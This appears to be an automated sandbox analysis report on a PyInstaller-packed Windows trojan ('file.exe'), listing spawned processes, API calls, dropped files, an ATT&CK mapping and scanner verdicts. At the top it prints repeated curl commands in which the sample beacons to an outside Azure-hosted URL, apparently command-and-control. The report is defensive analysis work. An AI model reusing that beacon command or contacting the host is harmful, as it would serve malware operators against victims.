Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6399D8880 cpuid

0_2_00007FF6399D8880

Source: C:\Users\user\Desktop\file.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_00007FFDFF1C9F54
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_00007FFDFF1C9D94
Source: C:\Users\user\Desktop\file.exe	Code function: EnterCriticalSection,__crt_fast_encode_pointer,EnumSystemLocalesW,LeaveCriticalSection,	1_2_00007FFDFF1C79D8
Source: C:\Users\user\Desktop\file.exe	Code function: GetPrimaryLen,EnumSystemLocalesW,	1_2_00007FFDFF1C9874
Source: C:\Users\user\Desktop\file.exe	Code function: GetPrimaryLen,EnumSystemLocalesW,	1_2_00007FFDFF1C9928
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	1_2_00007FFDFF1C980C
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetProcAddress,	1_2_00007FFDFF171604

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\ucrtbase.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-console-l1-1-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-datetime-l1-1-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-debug-l1-1-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-errorhandling-l1-1-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-fibers-l1-1-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-file-l2-1-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-handle-l1-1-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-libraryloader-l1-1-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-memory-l1-1-0.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-processthreads-l1-1-1.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\VCRUNTIME140.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI68922\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6399BC330 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF6399BC330

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF6399D518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF6399D518C

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFE14635610 _PyArg_ParseTuple_SizeT,PyEval_SaveThread,listen,PyEval_RestoreThread,_Py_NoneStruct,		1_2_00007FFE14635610
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00007FFE146345E8 PySys_Audit,PyEval_SaveThread,bind,PyEval_RestoreThread,_Py_NoneStruct,		1_2_00007FFE146345E8

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	11 Process Injection	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	32 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	34%	ReversingLabs	Win64.Trojan.Generic
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI68922\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-console-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-datetime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-debug-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-errorhandling-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-fibers-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-file-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-libraryloader-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-localization-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-memory-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-namedpipe-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-processenvironment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-processthreads-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-processthreads-l1-1-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-profile-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-rtlsupport-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-synch-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-synch-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-sysinfo-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-timezone-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-core-util-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-conio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-convert-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-environment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-filesystem-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-locale-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-math-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-process-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-runtime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-stdio-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-time-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\api-ms-win-crt-utility-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\python311.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\ucrtbase.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI68922\unicodedata.pyd	0%	ReversingLabs

Source	Detection	Scanner	Label
http://spvmoslv.brazilsotth.clo	0%	Avira URL Cloud	safe
http://spvmoslv.brazilsouth.clo	0%	Avira URL Cloud	safe
http://spvmoslv.brazilsotth.cloJh	0%	Avira URL Cloud	safe
http://spvmoslv.brazilsMUa	0%	Avira URL Cloud	safe
http://spvmoslv.brazils)	0%	Avira URL Cloud	safe
http://spvmoslv.brazils	0%	Avira URL Cloud	safe
http://spvmoslv.brazilsa;V%t	0%	Avira URL Cloud	safe

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	file.exe, 00000001.00000002.3015474672.00000246247D8000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.1760626669.0000024624C21000.00000004.00000020.00020000.00000000.sdmp	false		high
http://spvmoslv.brazilsouth.clo	curl.exe, 0000000D.00000003.1986647972.000002C391116000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1986571053.000002C391113000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.2091064539.0000023561B53000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000003.2091103305.0000023561B56000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000026.00000002.2825899074.000002913BBA9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cacerts.digicert.co	file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp	false		high
http://spvmoslv.brazilsMUa	cmd.exe, 00000017.00000002.2406037996.000002495FCDB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.python.org/download/releases/2.3/mro/.	file.exe, 00000001.00000003.1762993421.0000024624C67000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3015474672.0000024624750000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.1762436129.0000024624C66000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.dr	false		high
http://spvmoslv.brazilsotth.clo	curl.exe, 00000004.00000002.1778152644.0000016B7F679000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	file.exe, 00000001.00000003.1769014972.0000024622F93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1760626669.0000024624C21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1766974952.0000024622F9D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1765110728.0000024622F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1764792973.0000024622F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1764029258.0000024622F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3015317587.0000024622F36000.00000004.00000020.00020000.00000000.sdmp	false		high
http://spvmoslv.brazils)	cmd.exe, 0000000B.00000002.1987434751.00000151D2B3B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.openssl.org/H	libcrypto-1_1.dll.0.dr	false		high
http://www.iana.org/time-zones/repository/tz-link.html	file.exe, 00000001.00000003.1767658653.0000024624E9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1770016415.0000024624EA5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://spvmoslv.brazilsa;V%t	cmd.exe, 0000000E.00000002.2093847695.0000023B32ECA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	file.exe, 00000001.00000003.1767658653.0000024624E9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1770016415.0000024624EA5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://peps.python.org/pep-0205/	file.exe, 00000001.00000002.3015867806.0000024624D20000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr	false		high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	file.exe, 00000001.00000003.1769014972.0000024622F93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1760626669.0000024624C21000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1766974952.0000024622F9D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1765110728.0000024622F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1764792973.0000024622F9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1764029258.0000024622F9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3015317587.0000024622F36000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	file.exe, 00000001.00000002.3015317587.0000024622F36000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	file.exe, 00000001.00000003.1767658653.0000024624E9E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1770016415.0000024624EA5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://spvmoslv.brazilsotth.cloJh	curl.exe, 00000004.00000002.1778152644.0000016B7F679000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
